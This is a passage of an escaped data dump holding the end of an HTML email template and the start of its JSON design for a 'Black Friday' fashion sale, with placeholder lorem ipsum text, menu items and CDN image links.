target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-black\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_35\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 15px 20px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #f5f5f5; line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\"><span style=\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 22.4px;\\\">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation <\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_36\\\" style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 22px 20px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ced4d9; line-height: 170%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 170%;\\\"><span style=\\\"font-size: 12px; line-height: 20.4px;\\\">&copy; Fashion | All Rights Reserve. <\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 170%;\\\"><span style=\\\"font-size: 12px; line-height: 20.4px;\\\"><span style=\\\"text-decoration: underline; line-height: 20.4px; font-size: 12px;\\\">Unsubscribe<\\/span>&nbsp; here<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":21,\\\"u_column\\\":29,\\\"u_content_menu\\\":1,\\\"u_content_text\\\":36,\\\"u_content_image\\\":10,\\\"u_content_timer\\\":1,\\\"u_content_button\\\":10,\\\"u_content_social\\\":2,\\\"u_content_divider\\\":4},\\\"body\\\":{\\\"id\\\":\\\"GV18HJ58oe\\\",\\\"rows\\\":[{\\\"id\\\":\\\"-j-7JbtKQX\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"8mzvqBlV3y\\\",\\\"contents\\\":[{\\\"id\\\":\\\"4mcWZHmjh6\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603383550682-Screenshot_1.png\\\",\\\"width\\\":251,\\\"height\\\":69},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"S5aKfBqVYk\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"_n240XDaNA\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Mkpj_fE_gW\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"5px 0px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603384133300-black-friday-mega-sale-social-media-facebook-cover-template_233825-96.png\\\",\\\"width\\\":300,\\\"height\\\":226},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"qQIDckHbBm\\\",\\\"contents\\\":[{\\\"id\\\":\\\"jg_Z79Uyn_\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"5px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 14px; line-height: 19.6px;\\\\\\\">DO NOT RUSH<\\/span><\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"XwSLnWhGTN\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 18px; line-height: 25.2px;\\\\\\\">CATCH TIME<\\/span><\\/strong><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 18px; line-height: 25.2px;\\\\\\\">NOW!<\\/span><\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"IRQURjJVkF\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#db1908\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"8px 25px 8px 24px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"font-size: 14px; line-height: 16.8px;\\\\\\\">GO<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":70,\\\"calculatedHeight\\\":32}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"9XGuynNlFn\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KiUtUTiorY\\\",\\\"contents\\\":[{\\\"id\\\":\\\"nFHzevz2Ys\\\",\\\"type\\\":\\\"menu\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"menu\\\":{\\\"items\\\":[{\\\"key\\\":\\\"1603383850591\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_self\\\"}},\\\"text\\\":\\\"HOME\\\"},{\\\"key\\\":\\\"1603383858336\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_self\\\"}},\\\"text\\\":\\\"BLACK FRIDAY\\\"},{\\\"key\\\":\\\"1603383867301\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_self\\\"}},\\\"text\\\":\\\"MAN\\\"},{\\\"key\\\":\\\"1603383872391\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_self\\\"}},\\\"text\\\":\\\"WOMAN\\\"}]},\\\"fontFamily\\\":{\\\"label\\\":\\\"Arial\\\",\\\"value\\\":\\\"arial,helvetica,sans-serif\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textColor\\\":\\\"#ffffff\\\",\\\"linkColor\\\":\\\"#0068A5\\\",\\\"align\\\":\\\"center\\\",\\\"layout\\\":\\\"horizontal\\\",\\\"separator\\\":\\\"|\\\",\\\"padding\\\":\\\"5px 22px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_menu_1\\\",\\\"htmlClassNames\\\":\\\"u_content_menu\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"_override\\\":{\\\"mobile\\\":{\\\"layout\\\":\\\"vertical\\\",\\\"padding\\\":\\\"8px 8px 5px\\\"}},\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"nkA-MY1qR_\\\",\\\"cells\\\":[32,68],\\\"columns\\\":[{\\\"id\\\":\\\"kP7c3hS5Az\\\",\\\"contents\\\":[{\\\"id\\\":\\\"AqPg555pA_\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 24px; line-height: 33.6px; font-family: \'Open Sans\', sans-serif;\\\\\\\">WHY DO WE<\\/span><\\/strong><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 24px; line-height: 33.6px; font-family: \'Open Sans\', sans-serif;\\\\\\\"> USE IT?<\\/span><\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"4HNAvVw3j1\\\",\\\"contents\\\":[{\\\"id\\\":\\\"RayghVoigS\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ced4d9\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\"><span style=\\\\\\\"font-family: Lato, sans-serif; font-size: 14px; line-height: 22.4px;\\\\\\\">Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in.<\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"#111416\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"Lh01KT4742\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"YPcxKW0bL1\\\",\\\"contents\\\":[{\\\"id\\\":\\\"QFxol5LSWl\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 18px; line-height: 25.2px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 25.2px; font-size: 18px;\\\\\\\">BLACK FRIDAY<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"50oHQS9KBh\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#383a3c\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><span style=\\\\\\\"font-size: 38px; line-height: 45.6px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 45.6px; font-family: \'Open Sans\', sans-serif; font-size: 38px;\\\\\\\">SPECIAL OFFER<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"OkTyVEU8-N\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 0px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#858586\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_8\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 20px; line-height: 28px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 28px; font-size: 20px;\\\\\\\"><span style=\\\\\\\"color: #db1908; line-height: 28px; font-size: 20px;\\\\\\\">BEST SALE<\\/span>&nbsp;FROM OUR STORE<\\/span><\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":false,\\\"center\\\":true,\\\"cover\\\":false},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"PbNE9MySh0\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"gWIFbweT7m\\\",\\\"contents\\\":[{\\\"id\\\":\\\"kR188iMYu6\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1603386706031-1.png\\\",\\\"width\\\":280,\\\"height\\\":187,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":true},\\\"textAlign\\\":\\\"left\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"7KdzXBmDlt\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#db1908\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_12\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>OUTERWEAR&nbsp;<\\/strong><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"zQWRi0C_rw\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#1b2a2f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_13\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p 